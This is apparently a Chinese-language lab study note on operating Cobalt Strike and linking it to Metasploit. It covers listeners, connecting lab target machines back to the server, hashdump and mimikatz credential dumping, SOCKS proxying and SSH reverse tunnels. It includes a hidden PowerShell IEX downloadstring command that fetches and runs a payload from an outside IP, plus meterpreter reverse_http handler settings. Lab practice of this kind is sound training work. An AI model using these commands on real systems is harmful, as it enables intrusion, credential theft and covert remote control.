一、快捷工具栏

3、需要创建监听器,才能让靶机上线,连接我们公网服务端上去开启的帧监听端口,做任何操作

都是通过服务器的IP地址去连接靶机,去和靶机进行文件stage的一个传输和交互。这里推荐把cs

放到公网上边,比较方便让靶机上线。

4-6单个视图

11、payload分为stage和stageless(相当于php大马,拥有所有的功能,包括meterpreter,很大,不

需其他的管理器就能实现完全的交互,网络环境比较差的时候可以使用它,大并且容易查杀)

12、已淘汰

13、生成恶意Office宏攻击,嵌入恶意宏攻击。

14、建立web_delivery是在内存上执行恶意代码,不会再服务器上留下文件的。

查看进程:ps aux | grep teamserver

kali -9 进程  干掉进程

sudo yum install java-11-openjdk-devel(cs4.3版本java11环境)

sudo yum list installed | grep java(查看已安装java)

sudo alternatives --config java (切换环境)

java -version(查看版本)

export JAVA_HOME=$(dirname $(dirname $(readlink -f $(which java))))

echo $JAVA_HOME     设置环境变量(此两条命令直接在命令行执行)

sudo lsof -i :50050     查看端口状态

./msg  用户名  信息(发送给指定用户)

二、创建监听器listener

点击Cobalt strike——监听器——add

获取靶机上线stager,任何靶机上线都是通过服务端

查看端口是否在线  netstat -ano |grep 8080

三、学习:cobaltrike实战演示1:

创建完监听器后,想让靶机上线(那就攻击靶机)

云服务器用作实验的话,如果安全组不需要特定要求,直接放通全部

靶机上线操作:

选择前边设置的监听器和方法(这里的方法我是用的是powershell)

选择文件保存位置,这里我保存到桌面为了方便(这个是windows10做的客户端)

之后需要再开启一个端口,让靶机可以下载这个文件,使用web-drive-by的host file,选择刚刚生

成的文件

复制下边内容

http://39.99.136.38:9090/download/file.ext

在靶机里边执行  (这使用的是windows7 64位操作系统)

此时靶机已上线

上线之后可以靶机进行一系列的控制

这里是默认60秒的心跳间隔(真实环境可以不修改,容易被ids查杀)

①设置时间间隔

②在beacon中  sleep  2亦可以设置

靶机想要下线就把进程(process)关掉,在这个界面退出会再次上线

shell ipconfig 命令

help 可以查看我们能执行的一些命令

重要模块

②转移③内存中获取密码④不建议开启(vps带宽较小,很卡)

screenshot截屏

在视图界面可以查看

亦可以端口扫描和查看进程

四、学习:cobaltrike实战演示2:

其他的监听器和attack进行一个主机上线,如下:

设置端口,监听器(同样如上执行,可以上线)

删除我们开启的东西

①mamager   web server

②attacks ——web-driver-by ——manager

这如果在设置的时候没有copy,这里也是可以copy的

想关掉,直接选中,点击kill

端口扫描完可做如下操作:(三个视图模式)

脚本可以github搜,选择一个路径导入cna,成功会显示ready(√)

五、学习:cobaltrike攻击流程:

拿root和system权限

选择监听器和利用脚本

自动打出去

两个用户是不一样的

①hashdump命令或者②右击——执行——hash(读取用户哈希值)或者③右键run mimikatz's

此时在任务管理器运行着powwershell.exe把它杀死了就没了(可以利用msf做进程迁移)

先右击exit和remove把靶机移除掉(新操作)(因为直接remove会在自动上线)

比较安全

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://35.12.32.156:9091/a'))"复制此代码到靶机去执行

此处是dvwa靶场

此时靶机又上线了

靶机上线方法:

①命令执行②文件上传,上传webshell(工具执行连接),无报错有权限执行,靶机即可上线(如果

cs是在内网中的,确定靶机能够连到cs)

六、学习:cs和msf联动

1、cs联动msf之socks代理(访问内网或者无法直接访问的服务器就需要建立代理)

2、cs联动msf之外部监听器

3、练习

1、介绍:

cobalt strike(简称CS)及Metasploit(简称msf)各有所长,cs更适合作为稳控平台,msf更适用于与各

类内网信息搜集及漏洞利用。为了取各家之所长,我们进行联动。

meterpreter的功能十分强大,模块非常多,攻击,辅助,编码等等,cs进行团队合作,进行主机

的上线和smb的横向移动(内网管控平台)

环境搭建条件:

①cs客户端一台windows10操作系统,一台centos7操作系统(或者kali操作系统也行)

②一台云服务器作为cs服务器(公网上vps)

③一台windows7(可联网),一台windows2012(不联网)

操作步骤:

①socks  端口(如 socks  1234)

可以在vps查看(netstat -ano|grep 1234)是否是监听状态

如何连接代理(代理是对服务端的,客户端只是连接服务器,所有的操作都是在服务端即vps操作

的)

复制上述命令转到msf中执行

此时整个msf就被代理到了1234端口,此时进行辅助端口扫描

非常慢

kali中操作

在文件中写入如下内容保存

此时还ping不了(ping在tcp/ip上一层(icmp)不能对ping代理转发,namp可以进行no ping 扫

描)

此时会很慢(因为走代理)

虚拟机——物理网卡——运营商交换机——路由——vps服务器(此时就可扫描重要端口,不全

扫)

结果如下:

2、学习:cs联动msf之外部监听器

①创建一个新的linstener

转移时会开

把system的sesion发给metetpreter

kali中

将cs服务器的session发送到cs客户端也就是meterpreter(kali这一端)

外网ping不通内网(即cs服务器无法通cs客户端)做代理转发

保存退出

重启生效(有隧道转发功能)

执行此命令就可代理转发

此时内网的8085端口和vps的8085端口就通了(去看拓扑图)

选择上线的主机——右键span转移——选择监听器——外部的http8085 

拿到meterpreter

3、实操:操作步骤:

这里是提权一下后的ssystem权限的用户

①在vps中    vi  /etc/ssh/sshd_config(sshd_config是服务端配置文件)

②AllowTcpForwarding yes

GatewayPorts yes

TCPKeepAlive yes

PasswordAuthentication   yes

③systemctl restart sshd.service或者systemctl restart sshd(这样才有隧道转发的功能)

④回到本地的 kali 中,通过 ssh 隧道做转发

创建ssh隧道常用的参数:

-C:压缩传输,提供传输速度

-f :将ssh传输转入后台执行,不占用当前的shell

-N:建立静默连接(建立了连接,但是看不到具体会话)

-g:允许远程主机连接本地用于转发的端口

-L:本地端口转发

-R:远程端口转发

-D:动态转发

-P指定ssh端口

⑤命令执行:ssh -C-f-N -g -R 0.0.0.0:8085:192.168.129.139:8085 root@119.xx.xx.xx -p 22

含义解释:通过 119.xx.xx.xx 机器把外部的 8085 端口上的流量转到本地192.168.129.139 的 8085

端口上,而本地的 8085 端口上跑的又的监听器,所以,最终才造成 meterpreter本地上线的效

果。

⑥netstat -anltup 查看正在工作的端口

⑦netstat -tulnp |grep 8085查看服务器是否开启8085端口

此处有错误可以查杀pid  kill  pid即可(ssh)

⑧创建一个新的监听器

⑨在kali中启用msfconsole,设置参数

use exploit/multi/handler

set payload windows/meterpreter/reverse_http

set lhost  192.168.129.139

set lport 9999

show options

run

⑩ssh -C-f-N -g -R 0.0.0.0:8085:192.168.129.139:8085 root@119.xx.xx.xx -p 22

最好检查一下是否设置成功:netstat -anltup(没有问题做如下操作)

等待stage发送

此时拿到了meterpreter(这个不知道是抽了什么风,重启虚拟机之后,我搞了两次才出来,多次

尝试)比较卡,此时可以拿shell(如果显示乱码  chcp 65001),进程迁移,exit退出

一、快捷工具栏

二、创建监听器listener

三、学习:cobaltrike实战演示1:

四、学习:cobaltrike实战演示2:

五、学习:cobaltrike攻击流程:

六、学习:cs和msf联动

1、介绍:

2、学习:cs联动msf之外部监听器

3、实操:操作步骤:


Logo

华为开发者空间,是为全球开发者打造的专属开发空间,汇聚了华为优质开发资源及工具,致力于让每一位开发者拥有一台云主机,基于华为根生态开发、创新。

更多推荐